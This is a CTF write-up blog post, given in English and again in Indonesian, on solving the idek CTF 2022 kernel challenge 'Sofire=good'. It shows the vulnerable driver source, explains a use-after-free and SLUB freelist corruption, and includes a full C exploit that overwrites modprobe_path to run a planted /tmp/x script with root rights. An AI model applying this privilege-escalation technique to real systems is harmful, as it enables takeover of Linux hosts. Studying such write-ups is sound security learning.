IDEK CTF 2022 Sofire=good writeup

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pwn, kernel exploitation, ctf
14 minute read

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Last weekend, me and my team Project Sekai, participated in idek ctf 2022 (held in 2023 cause it got delayed). Crazily, we won the entire CTF, and I ended with 3 first bloods in the pwn category!!! (and 1 second blood). One of the challenges was Sofire=good. This challenge was a kernel challenge, exploiting a UAF in the kmalloc-512 general cache. The author’s solution was to use msg_msg, but I had a simpler solution of abusing the kernel free list.

The challenge

This is the source of the kernel module (some parts removed for brevity):

#define sofirium_art "  :!J5PPP5J!:\n 75PPPP55PPP57\nJPPPP!:!!JPPPPJ\nPPPPP!^~~7PPPPP\nJPPPP7!!:~PPPPJ\n 75PPP55PPPP57\n  :!J5PPP5J!:\n"
#define CHUNK_SIZE 0x100

typedef struct sofirium_head{
    char coin_art[0x70];
    struct sofirium_entry* head;
    int total_nft;
} sofirium_head;

typedef struct sofirium_entry{
    struct sofirium_entry* next;
    char nft[CHUNK_SIZE];
} sofirium_entry;

typedef struct request{
    int idx;
    char buffer[CHUNK_SIZE];
} request;

sofirium_head * head;

long device_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
    sofirium_entry* next;
    sofirium_entry* new;
    sofirium_entry* target;
    sofirium_entry* tmp;
    request req;
    int total_nft;

    if (copy_from_user(&req, (void*)arg, sizeof(request))) {
        printk(KERN_INFO "Copy Request from User Error");
        return -EFAULT;

    switch (cmd) {
        case 0x1337:
            debug_print(KERN_INFO "Deleting Blockchain: Sofirium is Bad");

            next = head->head;
            total_nft= head->total_nft;

            for (int i = 0; i < total_nft; i ++){
                debug_print(KERN_INFO "Freeing Buffer 0x%px\nNEXT: 0x%px", tmp, next->next);
                tmp = next;
                next = next->next;
            return 1;

        case 0xdeadbeef:
            if (head == NULL){
                head = kmalloc(sizeof(sofirium_head), GFP_KERNEL);
                head->total_nft = 0;
                strlcpy(head->coin_art, sofirium_art, sizeof(head->coin_art));

                printk(KERN_INFO "%s", head->coin_art);

                head->head = NULL;
                debug_print(KERN_INFO "Head NULL, Creating sofirium_head at 0x%px", head);
            if (head->total_nft == 0){
                new = kmalloc(sizeof(sofirium_entry), GFP_KERNEL);
                new->next = NULL;
                memcpy(new->nft, req.buffer, CHUNK_SIZE);
                head->head = new;
                head->total_nft = 1; 
                target = head->head;
                for (int i=1; i < head->total_nft; i++){
                    target = target->next;
                new = kmalloc(sizeof(sofirium_entry), GFP_KERNEL);
                new->next = NULL;
                memcpy(new->nft, req.buffer, CHUNK_SIZE);
                target->next = new;
                head->total_nft ++;
            debug_print(KERN_INFO "NEW NFT: %s @ 0x%px \n",new->nft, new);
            return head->total_nft;

        case 0xcafebabe:
            target = head->head;
            for (int i=0; i < req.idx; i++){
                debug_print(KERN_INFO "Walked over entry 0x%px", target->next);
                target = target->next;

            debug_print(KERN_INFO "Copy to user %s @ 0x%px", target->nft, target->nft);
            if(copy_to_user((void*)arg+offsetof(struct request, buffer),target->nft, sizeof(target->nft))){
                printk(KERN_INFO "Copy to user failed, exiting");
                return -EFAULT;
            return 0;

        case 0xbabecafe:
            target = head->head;
            for (int i=0; i < req.idx; i++){
                debug_print(KERN_INFO "Walked over entry %px", target->next);
                target = target->next;

            if(copy_from_user(target->nft, (void*)arg+offsetof(struct request, buffer),sizeof(target->nft))){
                printk(KERN_INFO "Copy from user failed exiting");
                return -EFAULT;
            debug_print(KERN_INFO "Copy from user %s to 0x%px", target->nft, target->nft);

            return 0;
            return 0xffff;

The 4 cases are:

  • 0x1337 -> delete the entire nft linked list
  • 0xdeadbeef -> Init head if not null, init next node in linked list
  • 0xcafebabe -> Copy value of nft at index i to user
  • 0xbabecafe -> Edit value of nft at index i from user

basic CRUD stuff you might see in a basic heap challenge.

The bug

The bug is simple, in the “delete” case, the head and the nodes are not nulled!

case 0x1337:
    debug_print(KERN_INFO "Deleting Blockchain: Sofirium is Bad");

    next = head->head;
    total_nft= head->total_nft;
    kfree(head); // Not NULLed

    for (int i = 0; i < total_nft; i ++){
        debug_print(KERN_INFO "Freeing Buffer 0x%px\nNEXT: 0x%px", tmp, next->next);
        tmp = next;
        next = next->next;
        kfree(tmp); // Not NULLed

    return 1;

This means we have a basic UAF.

Next thing to note is the size of the data allocated for an NFT

#define CHUNK_SIZE 0x100

typedef struct sofirium_entry{
    struct sofirium_entry* next;
    char nft[CHUNK_SIZE];
} sofirium_entry;
new = kmalloc(sizeof(sofirium_entry), GFP_KERNEL);

This means we run kmalloc(264), round to the larger cache, this means we kmalloc onto the kmalloc-512 cache. At this point we can try to find objects that might get allocated to that cache to abuse, but thats too much of a hassle, so I tried to find a different way.

Quirk of the kernel heap free list

According to, the heap next free chunk in a freed chunk is NOT at the beginning of the chunk (unlike how glibc heap works), but instead its in the middle of the chunk. This is to prevent freelist corruption with heap overflow, but this might be useful for us.

This is a good spot to pause if you would like to figure it out for yourself!

Why is that useful?

The sofirium_entry struct stores a pointer in the beginning of the struct, and we have a 256 bytes sized char array after it. If the pointer to the next free chunks is in the middle, this means its at around offset 256. Oh, our char array reads/writes from byte 8 to 264, thats a perfect amount!

With this, we can overwrite the pointer to the next free chunk, and potentially get arbitrary read and write. Now, there are some protections to this, like freelist randomization, and preventing write to outside of the heap area, but I just took a risk and assumed they weren’t being used. Guess what? They weren’t :)

The plan

With this, the plan is:

  • Leak heap area of kmalloc-512
  • Leak kernel base
  • Write to modprobe_path

Leaking the area of kmalloc-512 is easy, since we print bytes 8 to 264, we can easily print the next free chunk pointer in a freed chunk. To leak and and write to modprobe_path, we can abuse an overlapped chunk. This is done by leaking the heap first, then changing the pointer to be inside another chunk.

For example, say we had chunk A B and C, and the free list was C->B->A. If we edit C first, we can change the pointer to point INSIDE B. This gives us access to edit the pointer in a sofirium chunk.

The first pointer in the sofirium chunk is so helpful, as we can change it to read and write anywhere, as it effectively changes the next chunk location in the nft linked list. With this we can try to search the kmalloc-512 cache for a kernel leak, and then write to modprobe path.

Thats it

Thats it tbh. From there you can follow this guide by Midas to get priv escalation by overwritting modprobe_path. Very fun chall!


Some things I noted during exploiting this:

  • The overlapped chunk has to be aligned to 0x100. This still breaks sometimes, but it NEVER worked if it wasnt aligned
  • Allocation is random, so the kernel leak isnt consistant, and it may take some bruteforcing. My exploit works about 1/10 times

Here’s the full script:

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <sys/wait.h>
#include <poll.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CHUNK_SIZE 0x100

typedef struct request{
    int idx;
    char buffer[CHUNK_SIZE];
} request;

void get_flag(void){
    puts("[*] Returned to userland, setting up for fake modprobe");
    system("echo '#!/bin/sh\ncp /flag.txt /tmp/flag\nchmod 777 /tmp/flag' > /tmp/x");
    system("chmod +x /tmp/x");

    system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");
    system("chmod +x /tmp/dummy");

    puts("[*] Run unknown file");

    puts("[*] Hopefully flag is readable");

int main(int argc, char *argv[])
    int global_fd = open("/dev/Sofire", O_RDONLY);
    request data;
    data.idx = 0;
    strncpy(data.buffer, "AAAA", CHUNK_SIZE);
    int a = ioctl(global_fd, 0xdeadbeef, &data);   
    strncpy(data.buffer, "BBBB", CHUNK_SIZE); 
    a = ioctl(global_fd, 0xdeadbeef, &data);   
    strncpy(data.buffer, "CCCC", CHUNK_SIZE);  
    a = ioctl(global_fd, 0xdeadbeef, &data);
    a = ioctl(global_fd, 0x1337, &data);

    unsigned long long *p = &data.buffer;
    data.idx = 0;
    a = ioctl(global_fd, 0xcafebabe, &data);
    unsigned long long leak0 = p[CHUNK_SIZE / 8 - 1];
    data.idx = 2;
    a = ioctl(global_fd, 0xcafebabe, &data);
    unsigned long long leak1 = p[CHUNK_SIZE / 8 - 1];
    printf("0x%llx 0x%llx\n", leak0, leak1);

    data.idx = 2;
    unsigned long long fake = leak1 + 0x100;
    p[CHUNK_SIZE / 8 - 1] = fake;
    p[0] = 0x43434343;
    a = ioctl(global_fd, 0xbabecafe, &data);
    strncpy(data.buffer, "DDDD", CHUNK_SIZE);
    a = ioctl(global_fd, 0xdeadbeef, &data);
    p[0] = 0x45454545;
    a = ioctl(global_fd, 0xdeadbeef, &data);

    p[0] = 0x42424242;
    p[CHUNK_SIZE / 8 - 1] = leak0 + 0x400;
    data.idx = 1;
    a = ioctl(global_fd, 0xbabecafe, &data);

    data.idx = 4;
    a = ioctl(global_fd, 0xcafebabe, &data);
    for (int i = 0; i < CHUNK_SIZE / 8; i ++){
        printf("0x%llx\n", p[i]);
    unsigned long long modprobe_path = p[7] + 0x629ce0;
    printf("0x%llx\n", modprobe_path);

    p[0] = 0x42424242;
    p[CHUNK_SIZE / 8 - 1] = modprobe_path-0x10;
    data.idx = 1;
    a = ioctl(global_fd, 0xbabecafe, &data);

    data.idx = 4;
    strncpy(data.buffer, "AAAAAAAA/tmp/x\x00", CHUNK_SIZE);
    a = ioctl(global_fd, 0xbabecafe, &data);

    // After that you cat /tmp/flag

    return 0;

Final words

Thanks for the great CTF idek! Unexpected result tbh, wasnt expecting pjsk to win, but after 48 hours of tryharding we did it!

Cant wait for idek CTF 2023!

Bahasa Indonesia

Pekan lalu, saya dan timku Project Sekai, berpartisipasi di idek CTF 2022 (diadakan di 2023 karena tertunda). Menariknya, kami memenangkan CTFnya, dan aku berhasil mendapatkan 3 first blood di kategori pwn!!! (dan satu second blood). Salah satu tantangannya adalah Sofire=good. Tantangan ini merupakan tantangan kernel, dimana kita perlu exploit sebuah UAF di cache kmalloc-512. Solusi dari pembuat soal adalah menggunakan msg_msg, tetapi aku menemukan solusi yang jauuuuh lebih simpel, yaitu menggunakan freelist pada kernel heap.


Berikut source dari module kernel yang digunakan (beberapa bagian dihapus untuk mempersingkat):

#define sofirium_art "  :!J5PPP5J!:\n 75PPPP55PPP57\nJPPPP!:!!JPPPPJ\nPPPPP!^~~7PPPPP\nJPPPP7!!:~PPPPJ\n 75PPP55PPPP57\n  :!J5PPP5J!:\n"
#define CHUNK_SIZE 0x100

typedef struct sofirium_head{
    char coin_art[0x70];
    struct sofirium_entry* head;
    int total_nft;
} sofirium_head;

typedef struct sofirium_entry{
    struct sofirium_entry* next;
    char nft[CHUNK_SIZE];
} sofirium_entry;

typedef struct request{
    int idx;
    char buffer[CHUNK_SIZE];
} request;

sofirium_head * head;

long device_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
    sofirium_entry* next;
    sofirium_entry* new;
    sofirium_entry* target;
    sofirium_entry* tmp;
    request req;
    int total_nft;

    if (copy_from_user(&req, (void*)arg, sizeof(request))) {
        printk(KERN_INFO "Copy Request from User Error");
        return -EFAULT;

    switch (cmd) {
        case 0x1337:
            debug_print(KERN_INFO "Deleting Blockchain: Sofirium is Bad");

            next = head->head;
            total_nft= head->total_nft;

            for (int i = 0; i < total_nft; i ++){
                debug_print(KERN_INFO "Freeing Buffer 0x%px\nNEXT: 0x%px", tmp, next->next);
                tmp = next;
                next = next->next;
            return 1;

        case 0xdeadbeef:
            if (head == NULL){
                head = kmalloc(sizeof(sofirium_head), GFP_KERNEL);
                head->total_nft = 0;
                strlcpy(head->coin_art, sofirium_art, sizeof(head->coin_art));

                printk(KERN_INFO "%s", head->coin_art);

                head->head = NULL;
                debug_print(KERN_INFO "Head NULL, Creating sofirium_head at 0x%px", head);
            if (head->total_nft == 0){
                new = kmalloc(sizeof(sofirium_entry), GFP_KERNEL);
                new->next = NULL;
                memcpy(new->nft, req.buffer, CHUNK_SIZE);
                head->head = new;
                head->total_nft = 1; 
                target = head->head;
                for (int i=1; i < head->total_nft; i++){
                    target = target->next;
                new = kmalloc(sizeof(sofirium_entry), GFP_KERNEL);
                new->next = NULL;
                memcpy(new->nft, req.buffer, CHUNK_SIZE);
                target->next = new;
                head->total_nft ++;
            debug_print(KERN_INFO "NEW NFT: %s @ 0x%px \n",new->nft, new);
            return head->total_nft;

        case 0xcafebabe:
            target = head->head;
            for (int i=0; i < req.idx; i++){
                debug_print(KERN_INFO "Walked over entry 0x%px", target->next);
                target = target->next;

            debug_print(KERN_INFO "Copy to user %s @ 0x%px", target->nft, target->nft);
            if(copy_to_user((void*)arg+offsetof(struct request, buffer),target->nft, sizeof(target->nft))){
                printk(KERN_INFO "Copy to user failed, exiting");
                return -EFAULT;
            return 0;

        case 0xbabecafe:
            target = head->head;
            for (int i=0; i < req.idx; i++){
                debug_print(KERN_INFO "Walked over entry %px", target->next);
                target = target->next;

            if(copy_from_user(target->nft, (void*)arg+offsetof(struct request, buffer),sizeof(target->nft))){
                printk(KERN_INFO "Copy from user failed exiting");
                return -EFAULT;
            debug_print(KERN_INFO "Copy from user %s to 0x%px", target->nft, target->nft);

            return 0;
            return 0xffff;

4 kasusnya adalah:

  • 0x1337 -> hapus seluruh linked list nft
  • 0xdeadbeef -> initialisasi head nft, inisialiasi node baru
  • 0xcafebabe -> Salin nilai dari nft pada indeks ke i ke user
  • 0xbabecafe -> Ubah nilai dari nft pada indeks ke i ke user

CRUD biasa yang biasa ditemukan pada soal heap.


Bugnya sangan simpel, pada kasus “hapus”, kepada dan nodenya tidak dijadikan null!

case 0x1337:
    debug_print(KERN_INFO "Deleting Blockchain: Sofirium is Bad");

    next = head->head;
    total_nft= head->total_nft;
    kfree(head); // Not NULLed

    for (int i = 0; i < total_nft; i ++){
        debug_print(KERN_INFO "Freeing Buffer 0x%px\nNEXT: 0x%px", tmp, next->next);
        tmp = next;
        next = next->next;
        kfree(tmp); // Not NULLed

    return 1;

Hal ini berarti kita mempunyai UAF

Hal berikut yang mesti diperhatikan merupakan ukuran dari NFT yang dialokasi

#define CHUNK_SIZE 0x100

typedef struct sofirium_entry{
    struct sofirium_entry* next;
    char nft[CHUNK_SIZE];
} sofirium_entry;
new = kmalloc(sizeof(sofirium_entry), GFP_KERNEL);

Hal ini berarti kita menjalankan kmalloc(264), membulatkan ke cache yang lebih besar,l hal ini berarti kita alokasikan chunk pada cache kmalloc-512. Sekarang kita bisa cari objek kernel yang dilalokasikan pada cache yang sama, tetapi itu terlalu ribet, jadi aku coba cari cara yang lain.

Hal menarik dari kernel heap freelist

Menurut, chunk next pada free chunk itu BUKAN diawal chunk, melainkan di tengah chunk (berbeda dengan cara kerja heap glibc). Hal ini diperlukan untuk mencegak korupsi freelist melalui heap overflow, tetapi malah ini jadi hal yang bagus untuk kita.

Ini tempat yang bagus untuk berhenti jika ingin diselesaikan sendirian!

Kenapa itu berguna?

struct sofirium_entry menyimpan sebuah pointer diawal structnya, dan kita memiliki array of cahr sebesar 256 bytes setelahnya. Jika pointer ke next free chunk terletak ditengah, hal itu berarti lokasinya di sekitar offset 256. Eh, pas kali kita bisa nulis dari byte 8 hingga 264!

Dengan ini kita dapat overwrite pointer ke free chunk berikutnya dan berpotensi mendapatkan arbitrary read dan write. Nah, terdapat beberapa proteksi terhadap ini, seperti randomisasi freelist, dan pencegahan menulis diluar area heap, tetapi aku ambil resiko dan asumsi gaada yang hidup. Tau tau, ngak :)


Dengan ini, rencana kita adalah:

  • Leak area heap kmalloc-512
  • Leak kernel base
  • Nulis ke modprobe_path

Leak area kmalloc-512 lumayan gampang, dikarenakan kita dapat mencetak bytes 8 hingga 264, dengan gampang kita bisa cetak pointer ke next free chunk pada chunk yang sudah free. Untuk leak dan nulis ke modprobe_path, kita dapat gunakan overlapping chunk. Hal ini dilakukan dengan leak heap terlebih dahulu, dan kemudian ganti pointer next free chunk untuk tunjuk ke tengah chunk lain.

Sebagai contoh, katakan kita memiliki chunk A B dan C, dan free listnya terdiri dari C->B->A. Jika kita edit dulu chunk C, kita dapat ganti next free chunk ke TENGAH chunk B. Hal ini berakibat kita bisa ubah pointer pada sebuah sofirium chunk.

Pointer pertama pada sebuah sofirium chunk sangat berguna, sebab kita bisa ubahnya untuk membaca dan menulis kemanapun, karena secara efektif dia mengubah lokasi next node pada nft linked list. Dengan ini kita mencari kernel leak pada kmalloc-512, dan kemudian nulis ke modprobe_path.

Itu aja

Itu aja sih sebenarnya. Dari situ kalian bisa ikut panduan ini oleh Midas untuk mendapatkan priv escalation dengan overwrite modprobe_path. Soal yang sangat seru!


Beberapa hal yang saya catat ketika exploitasi ini:

  • Chunk yang dioverlap tetap harus align pada 0x100. Terkadang tetap gabisa, tapi jika tidak align, DIPASTIKAN tidak bisa.
  • Alokasinya sedikit random jadi leaknya gak 100% konsisten. Exploitku berhasil kira2 1/10 kali lah

Berikut script yang lengkap:

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <sys/wait.h>
#include <poll.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CHUNK_SIZE 0x100

typedef struct request{
    int idx;
    char buffer[CHUNK_SIZE];
} request;

void get_flag(void){
    puts("[*] Returned to userland, setting up for fake modprobe");
    system("echo '#!/bin/sh\ncp /flag.txt /tmp/flag\nchmod 777 /tmp/flag' > /tmp/x");
    system("chmod +x /tmp/x");

    system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");
    system("chmod +x /tmp/dummy");

    puts("[*] Run unknown file");

    puts("[*] Hopefully flag is readable");

int main(int argc, char *argv[])
    int global_fd = open("/dev/Sofire", O_RDONLY);
    request data;
    data.idx = 0;
    strncpy(data.buffer, "AAAA", CHUNK_SIZE);
    int a = ioctl(global_fd, 0xdeadbeef, &data);   
    strncpy(data.buffer, "BBBB", CHUNK_SIZE); 
    a = ioctl(global_fd, 0xdeadbeef, &data);   
    strncpy(data.buffer, "CCCC", CHUNK_SIZE);  
    a = ioctl(global_fd, 0xdeadbeef, &data);
    a = ioctl(global_fd, 0x1337, &data);

    unsigned long long *p = &data.buffer;
    data.idx = 0;
    a = ioctl(global_fd, 0xcafebabe, &data);
    unsigned long long leak0 = p[CHUNK_SIZE / 8 - 1];
    data.idx = 2;
    a = ioctl(global_fd, 0xcafebabe, &data);
    unsigned long long leak1 = p[CHUNK_SIZE / 8 - 1];
    printf("0x%llx 0x%llx\n", leak0, leak1);

    data.idx = 2;
    unsigned long long fake = leak1 + 0x100;
    p[CHUNK_SIZE / 8 - 1] = fake;
    p[0] = 0x43434343;
    a = ioctl(global_fd, 0xbabecafe, &data);
    strncpy(data.buffer, "DDDD", CHUNK_SIZE);
    a = ioctl(global_fd, 0xdeadbeef, &data);
    p[0] = 0x45454545;
    a = ioctl(global_fd, 0xdeadbeef, &data);

    p[0] = 0x42424242;
    p[CHUNK_SIZE / 8 - 1] = leak0 + 0x400;
    data.idx = 1;
    a = ioctl(global_fd, 0xbabecafe, &data);

    data.idx = 4;
    a = ioctl(global_fd, 0xcafebabe, &data);
    for (int i = 0; i < CHUNK_SIZE / 8; i ++){
        printf("0x%llx\n", p[i]);
    unsigned long long modprobe_path = p[7] + 0x629ce0;
    printf("0x%llx\n", modprobe_path);

    p[0] = 0x42424242;
    p[CHUNK_SIZE / 8 - 1] = modprobe_path-0x10;
    data.idx = 1;
    a = ioctl(global_fd, 0xbabecafe, &data);

    data.idx = 4;
    strncpy(data.buffer, "AAAAAAAA/tmp/x\x00", CHUNK_SIZE);
    a = ioctl(global_fd, 0xbabecafe, &data);

    // After that you cat /tmp/flag

    return 0;

Akhir kata

Terima kasih idek telah mengadakan CTF yang luar biasa! Hasil yang sedikit tidak dinyangka, tetapi setelah 48 tryhard tim pjsk berhasil menang!

Semoga CTF idek 2023 sama tingkat kualitasnya!